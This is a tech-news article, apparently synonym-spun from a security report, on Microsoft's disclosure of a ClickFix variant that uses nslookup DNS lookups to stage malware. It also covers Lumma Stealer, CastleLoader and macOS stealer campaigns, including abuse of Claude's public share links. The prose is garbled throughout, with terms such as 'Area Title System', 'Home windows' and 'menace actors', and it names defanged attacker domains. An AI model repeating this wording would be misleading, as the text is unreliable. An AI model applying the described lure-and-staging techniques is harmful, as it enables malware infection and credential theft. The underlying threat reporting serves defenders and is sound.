Close Menu
    Main Menu
    • Home
    • News
    • Tech
    • Robotics
    • ML & Research
    • AI
    • Digital Transformation
    • AI Ethics & Regulation
    • Thought Leadership in AI

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Microsoft Discloses DNS-Based mostly ClickFix Assault Utilizing Nslookup for Malware Staging

    February 15, 2026

    When to Watch Netflix’s ‘America’s Subsequent High Mannequin’ Docuseries

    February 15, 2026

    The Energy of ‘Quote-a-Day Management’ for Success

    February 15, 2026
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Facebook X (Twitter) Instagram
    UK Tech InsiderUK Tech Insider
    Home»AI Ethics & Regulation»Microsoft Discloses DNS-Based mostly ClickFix Assault Utilizing Nslookup for Malware Staging
    AI Ethics & Regulation

    Microsoft Discloses DNS-Based mostly ClickFix Assault Utilizing Nslookup for Malware Staging

    Declan MurphyBy Declan MurphyFebruary 15, 2026No Comments8 Mins Read
    Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Reddit
    Microsoft Discloses DNS-Based mostly ClickFix Assault Utilizing Nslookup for Malware Staging
    Share
    Facebook Twitter LinkedIn Pinterest Email Copy Link


    Microsoft has disclosed particulars of a brand new model of the ClickFix social engineering tactic during which the attackers trick unsuspecting customers into working instructions that perform a Area Title System (DNS) lookup to retrieve the next-stage payload.

    Particularly, the assault depends on utilizing the “nslookup” (brief for nameserver lookup) command to execute a customized DNS lookup triggered by way of the Home windows Run dialog.

    ClickFix is an more and more common method that is historically delivered by way of phishing, malvertising, or drive-by obtain schemes, usually redirecting targets to bogus touchdown pages that host pretend CAPTCHA verification or directions to deal with a non-existent downside on their computer systems by working a command both by way of the Home windows Run dialog or the macOS Terminal app.

    The assault methodology has develop into widespread over the previous two years because it hinges on the victims infecting their very own machines with malware, thereby permitting the menace actors to bypass safety controls. The effectiveness of ClickFix has been such that it has spawned a number of variants, similar to FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

    “Within the newest DNS-based staging utilizing ClickFix, the preliminary command runs by way of cmd.exe and performs a DNS lookup in opposition to a hard-coded exterior DNS server, slightly than the system’s default resolver,” the Microsoft Menace Intelligence workforce mentioned in a collection of posts on X. “The output is filtered to extract the `Title:` DNS response, which is executed because the second-stage payload.”

    Microsoft mentioned this new variation of ClickFix makes use of DNS as a “light-weight staging or signaling channel,” enabling the menace actor to achieve infrastructure below their management, in addition to erect a brand new validation layer earlier than executing the second-stage payload.

    “Utilizing DNS on this means reduces dependency on conventional internet requests and may help mix malicious exercise into regular community visitors,” the Home windows maker added.

    The downloaded payload subsequently initiates an assault chain that results in the obtain of a ZIP archive from an exterior server (“azwsappdev[.]com”), from which a malicious Python script is extracted and run to conduct reconnaissance, run discovery instructions, and drop a Visible Fundamental Script (VBScript) chargeable for launching ModeloRAT, a Python-based distant entry trojan beforehand distributed by way of CrashFix.

    To ascertain persistence, a Home windows shortcut (LNK) file pointing to the VBScript is created within the Home windows Startup folder in order that the malware is mechanically launched each time the working system is began. 

    The disclosure comes as Bitdefender warned of a surge in Lumma Stealer exercise, pushed by ClickFix-style pretend CAPTCHA campaigns that deploy an AutoIt-version of CastleLoader, a malware loader related to a menace actor codenamed GrayBravo (previously TAG-150).

    CastleLoader incorporates checks to find out the presence of virtualization software program and particular safety applications earlier than decrypting and launching the stealer malware in reminiscence. Outdoors of ClickFix, web sites promoting cracked software program and pirated films function bait for CastleLoader-based assault chains, deceiving customers into downloading rogue installers or executables masquerading as MP4 media information.

    Different CastleLoader campaigns have additionally leveraged web sites promising cracked software program downloads as a place to begin to distribute a pretend NSIS installer that additionally runs obfuscated VBA scripts previous to working the AutoIt script that hundreds Lumma Stealer. The VBA loader is designed to run scheduled duties chargeable for guaranteeing persistence.

    “Regardless of important regulation enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by quickly migrating to new internet hosting suppliers and adapting different loaders and supply strategies,” the Romanian cybersecurity firm mentioned. “On the core of many of those campaigns is CastleLoader, which performs a central position in serving to LummaStealer unfold by way of supply chains.”

    Apparently, one of many domains on CastleLoader’s infrastructure (“testdomain123123[.]store”) was flagged as a Lumma Stealer command-and-control (C2), indicating that the operators of the 2 malware households are both working collectively or sharing service suppliers. Nearly all of Lumma Stealer infections have been recorded in India, adopted by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.

    “The effectiveness of ClickFix lies in its abuse of procedural belief slightly than technical vulnerabilities,” Bitdefender mentioned. “The directions resemble troubleshooting steps or verification workarounds that customers could have encountered beforehand. Because of this, victims usually fail to acknowledge that they’re manually executing arbitrary code on their very own system.”

    CastleLoader isn’t the one loader that is getting used to distribute Lumma Stealer. Campaigns noticed as early as March 2025 have leveraged one other loader dubbed RenEngine Loader, with the malware propagated below the guise of recreation cheats and pirated software program like CorelDRAW graphics editor. In these assaults, the loader makes means for a secondary loader named Hijack Loader, which then deploys Lumma Stealer.

    In line with information from Kaspersky, RenEngine Loader assaults have primarily affected customers in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France since March 2025.

    The developments coincide with the emergence of varied campaigns utilizing social engineering lures, together with ClickFix, to ship quite a lot of stealers and malware loaders –

    • A macOS marketing campaign that has used phishing and malvertising ploys to ship Odyssey Stealer, a rebrand of Poseidon Stealer, which itself is a fork of Atomic macOS Stealer (AMOS). The stealer exfiltrates credentials and information from 203 browser pockets extensions and 18 desktop pockets functions to facilitate cryptocurrency theft.
    • “Past credential theft, Odyssey operates as a full distant entry trojan,” Censys mentioned. “A persistent LaunchDaemon polls the C2 each 60 seconds for instructions, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling visitors by way of sufferer machines.”
    • A ClickFix assault chain focusing on Home windows programs that makes use of pretend CAPTCHA verification pages on legitimate-but-compromised web sites to trick customers into executing PowerShell instructions that deploy the StealC info stealer.
    • An e mail phishing marketing campaign that makes use of a malicious SVG file contained inside a password‑protected ZIP archive to instruct the sufferer to run a PowerShell command utilizing ClickFix, finally ensuing within the deployment of an open-source .NET infostealer referred to as Stealerium.
    • A marketing campaign that exploits the general public sharing characteristic of generative synthetic intelligence (AI) companies like Anthropic Claude to stage malicious ClickFix directions on learn how to carry out quite a lot of duties on macOS (e.g., “on-line DNS resolver”), and distribute these hyperlinks by way of sponsored outcomes on search engines like google like Google to deploy Atomic Stealer and MacSync Stealer.
    • A marketing campaign that directs customers trying to find “macOS cli disk area analyzer” to a pretend Medium article impersonating Apple’s Assist Workforce to deceive them into working ClickFix directions that ship next-stage stealer payloads from an exterior server “raxelpak[.]com.”
    • “The C2 area raxelpak[.]com has URL historical past going again to 2021, when it appeared to host a security workwear e-commerce web site,” MacPaw’s Moonlock Lab mentioned. “Whether or not the area was hijacked or just expired and re-registered by the [threat actor] is unclear, but it surely matches the broader sample of leveraging aged domains with present repute to keep away from detection.”
    • A variation of the identical marketing campaign that phases ClickFix directions for supposedly putting in Homebrew on hyperlinks related to Claude and Evernote by way of sponsored outcomes to put in stealer malware.
    • “The advert reveals an actual, acknowledged area (claude.ai), not a spoof or typo-squatted web site,” AdGuard mentioned. “Clicking the advert results in an actual Claude web page, not a phishing copy. The consequence is evident: Google Advertisements + a widely known trusted platform + technical customers with excessive downstream influence = a potent malware distribution vector.”
    • A macOS e mail phishing marketing campaign that prompts recipients to obtain and run an AppleScript file to deal with supposed compatibility points, ensuing within the deployment of one other AppleScript designed to steal credentials and retrieve extra JavaScript payloads.
    • “The malware doesn’t grant permissions to itself; as a substitute, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) after which executes malicious actions by way of these binaries to inherit their permissions,” Darktrace mentioned.
    • A ClearFake marketing campaign that employs pretend CAPTCHA lures on compromised WordPress websites to set off the execution of an HTML Software (HTA) file and deploy Lumma Stealer. The marketing campaign can be identified to make use of malicious JavaScript injections to make the most of a way often called EtherHiding to execute a contract hosted on the BNB Good Chain and fetch an unknown payload hosted on GitHub.
    • EtherHiding presents attackers a number of benefits, permitting malicious visitors to mix with respectable Web3 exercise. As a result of blockchain is immutable and decentralized, it presents elevated resilience within the face of takedown efforts.

    A current evaluation printed by Flare has discovered that menace actors are more and more focusing on Apple macOS with infostealers and complicated instruments.

    “Almost each macOS stealer prioritizes cryptocurrency theft above all else,” the corporate mentioned. “This laser focus displays financial actuality. Cryptocurrency customers disproportionately use Macs. They usually maintain important worth in software program wallets. In contrast to financial institution accounts, crypto transactions are irreversible. As soon as seed phrases are compromised, funds disappear completely with no recourse.”

    “The ‘Macs do not get viruses’ assumption is not only outdated however actively harmful. Organizations with Mac customers want detection capabilities for macOS-specific TTPs: unsigned functions requesting passwords, uncommon Terminal exercise, connections to blockchain nodes for non-financial functions, and information exfiltration patterns focusing on Keychain and browser storage.”

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Declan Murphy
    • Website

    Related Posts

    REMnux v8 Linux Toolkit Launched With AI-Powered Malware Evaluation Capabilities

    February 15, 2026

    “Safety stays the supplier’s duty even when utilizing SaaS” Private Info Safety Fee imposes 36 billion gained in fines on three luxurious manufacturers’ Korean subsidiaries

    February 15, 2026

    SMS & OTP Bombing

    February 15, 2026
    Top Posts

    Evaluating the Finest AI Video Mills for Social Media

    April 18, 2025

    Utilizing AI To Repair The Innovation Drawback: The Three Step Resolution

    April 18, 2025

    Midjourney V7: Quicker, smarter, extra reasonable

    April 18, 2025

    Meta resumes AI coaching utilizing EU person knowledge

    April 18, 2025
    Don't Miss

    Microsoft Discloses DNS-Based mostly ClickFix Assault Utilizing Nslookup for Malware Staging

    By Declan MurphyFebruary 15, 2026

    Microsoft has disclosed particulars of a brand new model of the ClickFix social engineering tactic…

    When to Watch Netflix’s ‘America’s Subsequent High Mannequin’ Docuseries

    February 15, 2026

    The Energy of ‘Quote-a-Day Management’ for Success

    February 15, 2026

    Construct long-running MCP servers on Amazon Bedrock AgentCore with Strands Brokers integration

    February 15, 2026
    Stay In Touch
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo

    Subscribe to Updates

    Get the latest creative news from SmartMag about art & design.

    UK Tech Insider
    Facebook X (Twitter) Instagram
    • About Us
    • Contact Us
    • Privacy Policy
    • Terms Of Service
    • Our Authors
    © 2026 UK Tech Insider. All rights reserved by UK Tech Insider.

    Type above and press Enter to search. Press Esc to cancel.